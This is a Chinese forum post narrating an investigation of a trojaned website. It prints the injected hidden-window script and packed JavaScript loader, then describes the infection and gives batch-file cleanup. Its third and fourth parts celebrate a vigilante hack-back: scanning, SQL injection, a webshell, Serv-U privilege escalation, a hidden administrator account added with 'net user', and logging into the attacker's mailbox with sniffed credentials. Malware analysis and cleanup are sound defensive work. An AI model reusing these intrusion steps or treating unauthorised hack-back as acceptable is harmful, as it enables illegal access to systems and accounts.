【分享】以毒攻毒 直捣“毒窟”

紫色枫扬

社区贡献者
2006-03-15
14,960
0
0
说互联网上到处是“马窝”、“毒窟”,你信吗?不信?我们就来个现场直播!上演一场以毒攻毒,直捣“毒窝”的攻坚战,出发......
  一、陷入毒窝
  我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。
  测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。
  1.探毒
  第一步:下载网页
  (为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。
  第二步:分析网页代码
  用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:

<SCRIPT language=javascript>
window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>

  这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。
  第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下:
<script language=javascript src="http://my.*.com/admin.js>";</script>

  这是一个木马脚本,通过脚本调用了一个js文件。
  第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return&#39;\\w+&#39;};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(&#39;\\b&#39;+e(c)+&#39;\\b&#39;,&#39;g&#39;),k[c]);return p;}(&#39;Z("\\l\\t\\6\\9\\2\\g\\f\\6\\1\\K\\6\\d\\6\\b\\1\\Q\\1\\u\\5\\7\\1\\6 \\t\\c\\q\\0\\7\\1\\j\\1\\L\\5\\2(中间省去n多......)\\f\\e\\0\\6\\3\\i\\p\\b\ \8\\1\\O\\1\\9\\5\\2\\9\\x\\d\\g\\b\\1\\Q\\1\\g\\j\\o\\8\\1\\O")&#39;,62,68,&#39;145|40|164|42|56|141|156|162|73|143|144|51|155|50|160|157|151|154|54|75|123|146|163|47|61|60|142|170|53|165|166|106|103|150|117|152|101|57|171|167|55|105|124|102|66|63|147|115|71|65|175|120|173|62|121|72|134|104|107|176|52|eval|114|110|127|70|64|130&#39;.split(&#39;|&#39;),0,{}))

  很明显这个网马加密并且编译了,通过Google查询这应该是冰狐的网马。
  2.试毒:用虚拟机器的浏览器中打开被挂马的网页地址,有一个小窗口突然闪了一下消失了,网页迟迟不能打开,桌面任务栏上的网络连接图表突然长亮,硬盘狂响,应该是在往硬盘上下载什么。不管什么了,我不入地狱,谁入地狱?大概20秒钟好像木马好像已经下载完毕并运行了。
  二、刮骨疗伤
  木马入驻系统后对几个关键的地方进行查看。
  刮骨:
  1.任务管理器:
  运行任务管理器,通过和以前的进程对比发现多了lexplore.exe、SVCH0ST.EXE(0是数字)两个未知进程。试着结束 lexplore.exe进程,可以,但不到五秒钟又出现了。结束SVCH0ST.EXE进程,同样不到一秒也出现了。为什么会这样呢?通过分析发现:原来这两个进程是木马释放的两个文件创建的,构成了双保险,互相监视。当一方的进程被结束,另一方在下一个周期内对进程表进行扫描发现对方不在,就重新创建一个。另外如果有一个文件被删除,Wlgx.dll会重新释放一个(这是后来才发现的)。
  2.在搜索最新的文件:
  通过“资源管理器”→“工具”→“文件夹选项”→“查看”中设置“显示所有的文件”,运用文件搜索工具搜索今天创建的所有文件。通过对搜索结果的分析发现了几个可疑的文件,它们分别是:
  临时目录:%temp%\Wl2\lexplore.exe)
  释放库文件:%temp%\Wlgx.dll
  系统目录:%systemroot%\system32\SVCH0ST.EXE %systemroot%\system32\lexplore.exe
  在每个根目录下出现了三个文件:auatorun.inf、lexplore.exe、SVCH0ST.EXE(目的是在打开各个根目录的时候病毒会自动运行。)
  注:以上文件都是隐藏、只读、系统文件。
  3.注册表中新添加的项目
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "myWl2"="%temp%\Wl2\lexplore.exe"
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
  "Shell"="EXPLORER.EXE,SVCH0ST.EXE"
  4.服务管理器
  运行服务管理器通过对比发现多了两个可疑的项目:
  服务名称:SVCH0ST
  显示名称:SVCHOST
  描述:系统网络服务组件
  可执行文件的路径:c:\windows\system32\SVCH0ST.EXE
  启动类型:自动
  服务状态:启动
  服务名称:lexplore.exe
  显示名称:lexplore.exe
  描述:网络浏览辅助
  可执行文件的路径:c:\windows\system32\lexplore.exe
  启动类型:自动
  服务状态:启动
  疗伤:
  1.结束进程:由于这两个进程直接互相保护,只能采取非常规的办法,用批处理,代码如下:
@echo off
taskkill /f /im SVCH0ST.EXE
copy c:\windows\notepad.exe c:\windows\system32\SVCH0ST.EXE
taskkill /f /im lexplore.exe
del c:\windows\system32\SVCH0ST.EXE
del c:\windows\system32\lexplore.exe
exit

  说明:(1).由于两个进程之间互相保护,大概每隔五秒钟就扫描一次进程,如果用手工的方法太慢,没有等把源文件删除,木马的进程已经被创建出来,就无法删除源文件。(2).代码第三行在SVCHOST.EXE进程被结束掉后,用notepad.exe(记事本)程序替换木马程序,那么当 lexplore.exe进程发现SVCH0ST.EXE进程被结束重新创建的该进程,其实就是打开了记事本程序。那么现在结束lexplore.exe 进程,就不会有真正的SVCH0ST.EXE保护了。
  2.删除病毒文件:两个系统目录下的病毒文件被删除,其它地方的病毒我们同样用批处理,代码如下:
@echo off
del %temp%\Wl2\lexplore.exe
del %temp%\Wlgx.dll
cd
attrib -a -s -h autorun.inf
attrib -a -s -h lexplore.exe
attrib -a -s -h SVCH0ST.EXE
del autorun.inf
del lexplore.exe
del SVCH0ST.EXE
d:
attrib -a -s -h autorun.inf
attrib -a -s -h lexplore.exe
attrib -a -s -h SVCH0ST.EXE
del autorun.inf
del lexplore.exe
del SVCH0ST.EXE

  注:我的虚拟机只有两个分区,为了下面的木马分析,我保存了lexplore.exe、SVCH0ST.EXE、Wlgx.dll木马文件。
  三、深入毒窝
  文章写到这里,突然有个想法,进入毒窟看看!试试能否进入那台挂马者放置木马文件主机。
  这是一台web服务器,先旁注看看目标还有什么站,结果发现是一个商业站点,只有一个站,主机是独立的。不管那么多,开着X-Scan扫描一下再说,接着去问问“Google”,看看到底是个什么站。关键字输入:http://www.*.com (安全原因,用了*)结果什么也没有出来,点击下面的“寻找网页包含有www.*.com”,出现了不该看到的结果。这些网站都被插入了木马,真可怜,稍微整理了一下搜索结果,除去有些站长求助的帖子外,足有30多个不同的站点被插入了恶意代码!而且都是国内的站点。先不管了,看看我的扫描结果,目标开了 21.80.3389端口。21的FTP连接不上,80是网址服务器,3389是默认的终端服务器,先3389连接看看,过了N久才连接上,速度特慢。尝试了几个弱密码均告失败。去http://www.ip138.com看了一下,填上Ping出来的ip地址,才发现是深圳网通的主机,和笔者所在地区相隔太远,怪不得这么慢。
  换个思路,试试为web注入,千辛万苦找到一个注入点,获取管理员账户和密码,扫描得到网站后台,登录进入后台,通过“备份数据库”得到一个 webshell。试试cmd,可以执行,但权限太低。对方开来ftp应该安装有ftp软件。果然在“c:\Program Files”中看到了Serv-U,著名的Serv-U漏洞大家都知道吧!试试提权,不成功!上传一个ftp提取工具,再试成功。可以马上创建一个管理员用户:
net user asp$ "test" /add
net localgroup administrators asp$ /add

  389远程登录,大概看了一下帮管理员清除了网马,留言提示管理员修补漏洞,撤人。
  四、还治其人
  通过分析SVCH0ST.EXE是木马的主程序,运用查壳工具发现加了壳,马上脱壳。用十六进制编辑器WinHex打开脱壳后的木马,估计是个QQ尾巴木马,这样的木马是用来盗取QQ的,一般把盗取的QQ号和密码发到指定的邮箱,或者ftp服务器的一个文件中。以http、www搜索,没有结果,看来它不是用ftp文件形式存放QQ号和密码的。再以@*.com搜索,终于看到了一个邮箱地址*@gmail.com(安全原因,用了*),查找密码,没有发现,一定是加密了。一般这样的木马在配置的时候必须要填入邮箱密码,不然不能发送邮件。我们先打开嗅探工具,我用的是WSockExpert,设置对于 SVCH0ST.EXE的网络数据进行嗅探。接着运行QQ输入用户名和密码登录,登录成功,这期间看见WSockExpert再不断地抓包,大概再QQ登录后一分钟停止嗅探。通过对数据包的分析很快找到了邮箱密码,因为是明文,所有很好找。马上登录邮箱,成功了!好家伙,竟然盗了这么多,我的QQ号和密码赫然其中!怎么办?改了他的邮箱密码吗?算了,删了与QQ相关的邮件,另外用邮箱自发一个警告邮件!
  结束语:这次“攻毒”行动,虽有波折,但还算顺利。用两句话来结束这篇文章:我不入地狱,谁人地狱?我入地狱,为了你们不入地狱!